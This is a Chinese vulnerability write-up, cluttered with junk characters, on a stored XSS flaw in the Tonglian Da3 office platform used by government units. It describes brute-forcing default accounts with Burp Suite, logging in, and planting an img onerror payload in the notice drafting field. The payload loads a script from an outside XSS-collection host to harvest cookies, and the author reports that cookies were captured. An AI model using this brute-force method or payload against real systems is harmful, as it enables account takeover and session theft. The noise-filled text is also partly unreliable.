+ i* a) z& ?4 F2 S/ U# G
3 ?% O1 J5 [+ A3 d% ?) w 同联Da3协同办公平台后台通用储存型xss漏洞' x: y0 i9 z0 K) |: K- I: h
' X. G# l* h: a) u' Z
6 ~, |2 b1 `0 j8 C% s) \0 ` 平台简介:$ A) H4 k6 [2 Q$ a
6 q; {' E% d; ` , f7 o* P- D! ~6 Q" Z6 @
! I& N# }; Y2 I! U6 z
/ N/ J+ ^; P/ m
; p+ u; k2 |8 c4 J2 Y) M4 Z& w 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 `" G) x" V4 o$ g. W0 D% s同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. H, Q( f2 U9 i# z$ |. A
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 F2 B( f5 f" Q5 t; A5 M5 n
5 ~# o% P7 [' c8 o% {1 b ! {8 y9 o& L# N E
' x, f1 l# o" ?( E l( ]! q- S
% f: y, _1 R% K! a3 b2 u( A8 q7 z2 u
# K1 u9 h% N" f" L9 w, }) t 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:1 {% z( v/ D4 L- Z; D
! @! h! b0 G1 \: B. `4 i* S) @2 W* S \
) |/ s) m) \! Y6 A4 O# Q
, V2 Q, y2 {3 t
# X( f' F0 f4 _' h& K' \8 m( S) h! X
y( q3 s- @2 }/ |2 G) n3 V" Y$ s
http://1.1.1.1:7197/cap-aco/#(案例2-)8 }4 b& C2 }6 `( H3 A
: v5 _8 u5 ?; @% z$ M8 P [
/ X) F" h" g; ^9 ?! e http://www.XXOO.com (案例1-官网网站)
5 w/ }! ?! G) O3 r0 u% j
; [2 L! G7 _8 r1 ? ! D& F' `+ l. W* E
漏洞详情:5 j$ z6 g! [$ Q+ S5 m
7 ~( z1 J$ Q& e- F8 K
2 K6 U# Y( v2 g8 r2 f' ^ 案例一、
5 v% u% e2 ~5 W+ ]; Z; [: S
6 v( P* o; q( @; c
/ M |" ^# f2 ~ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
- _0 D1 R4 Q: }- T0 O
/ l2 C7 y* S) V& d , j! N$ r4 c! r" K3 j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:& f: @* [# Z) L t
! A2 z/ H; P$ |0 [# X
; w3 M. p$ Q( M e 9 I& Q! j5 N) e3 J9 e, K1 g* a# G
/ l# }& i0 l! N q! J/ r/ U4 m
/ z# _7 B' X, ]! e2 L
' `( }& b( Y% d3 ]! z
+ l e' U; ?& {4 T# ?
0 x2 g+ }- V d0 [2 o" Y
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
+ o* d, S- \; O7 O s9 }* V7 L7 r
' ?2 V# Y$ J% i1 ~5 x" }
5 @; v1 w/ ?0 L* Z8 a8 t 9 Q% k4 m+ \7 V5 A9 N( R3 c
+ } C& e2 i6 r8 o: a# ^
( U0 B5 G; ?: J7 E- ~
2 f& o3 q, f9 j7 i5 C {* _
. D) h9 Z) {5 s4 [! K( I2 U
, l2 G& O9 A }3 i n: c; T 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
# q m8 P( V* w& {; ^
% U; \& X' S$ P' O% P1 P5 z% p
: U) J& G) @/ U1 i4 h
! T( Q$ u( A8 E9 l
$ j. k0 A) U# a
: W. Z3 ^# H2 C; B* a9 S \: K5 z1 f
<img src=x
f5 F9 l( |. Q M( ]onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
$ Y, I" A s* N8 R. h
' W& m' e+ J; f$ X& y: B' i
; l x+ U# Y& ~# Y. N, g
Y! y3 n9 h( a7 Y5 U$ D
, V6 R7 ^- ]6 L, M& u ! N+ u, T3 J( c* F' E/ V) C, z
然后发送,接收cookie如图:
* O1 J7 s: Z0 a
: n' f0 T' X6 G6 F; y P( L
5 X3 J+ a7 X8 Y# U( F+ f
+ }+ S, H- |) R" A! n# U
1 K' P. d7 L. N7 r: C! J 8 g' x5 _# q( Q1 A
7 X, i' B: ]' m: \ G
+ X! R8 y( R% \! x
' V9 d# b! m0 O7 N( Q& ~) H7 p
8 Q2 I* U8 K" V9 w
4 {2 c% _, v( I" z: T; b
3 H8 n: g6 W4 D* x+ Z9 `
0 z* q' d! B/ ~
4 N2 c/ P2 g8 Z$ z/ q& q
9 e# z, x7 [) y( @
% O; \/ x% Y K- u
2 V: Z# w- h+ f- m7 e
3 u3 g* x2 V# p1 d
8 c1 ~: d% d( A" @0 y3 E
L! e0 T/ D# O$ ^2 t
' H* b0 I! o+ i2 T8 Q' A. |* x% y
- ~6 t, m9 ~/ o l$ Z
3 i5 N! u, q7 u! ?" D$ C; r 2 P- V8 X! ~, h4 }1 x# d
案例2、 * A) d3 m% j; a1 G
& }8 X% x% f( O! |
1 k) F3 B& T" t- D; I
前面步骤都一样,下面看效果图: 9 C- E9 I% G5 z" z) G6 F2 h
. H' ^8 X. ?, ? J, A! t
6 L4 r( j& `* F8 n0 X
2 E2 h m6 g0 F+ h& V5 t
5 K+ U, P' X# Q0 O
# _$ n4 |7 f5 @6 z, ^$ \# T' x
$ r4 I" `8 g0 R/ V/ E0 b( v- a5 ~
/ r; t7 T4 W( [- Z$ V% e0 k$ ^$ V( h
8 n- j# c4 R4 o9 q1 g* a
+ ?( x0 j+ r) I) b6 D
4 H+ Z! y3 A B, F+ n, v B+ r
& g2 Z \- Y+ ?1 h/ c 3 p' h" U" f0 }% w9 M! R
7 `0 u1 U2 r3 e0 j- r+ I
0 [' }4 ~; v- Z3 ^
, Y# p4 b# R6 L" D; l& z9 ?9 n) c
8 n+ X" I$ P# {: X' I y
) g) N5 `: _! f3 d- J/ P
* X6 {/ o" S: `4 L: z" c* m! m
% D/ v f- W8 ~2 x7 {% w ( Q. g( H6 Y! d: A0 y
' ?' A# U) L3 E) L ?& ]
* I' K6 y" @* \7 ]/ k2 \; |
" A1 W: o+ [7 {% D% ~5 f
: d8 o! p1 f, I, G
/ u/ |" @" ?5 u ; H9 m _, y% P7 P9 ?
8 k4 U' F' `, P5 n0 F
5 w# |" W; [, T6 ]9 w4 m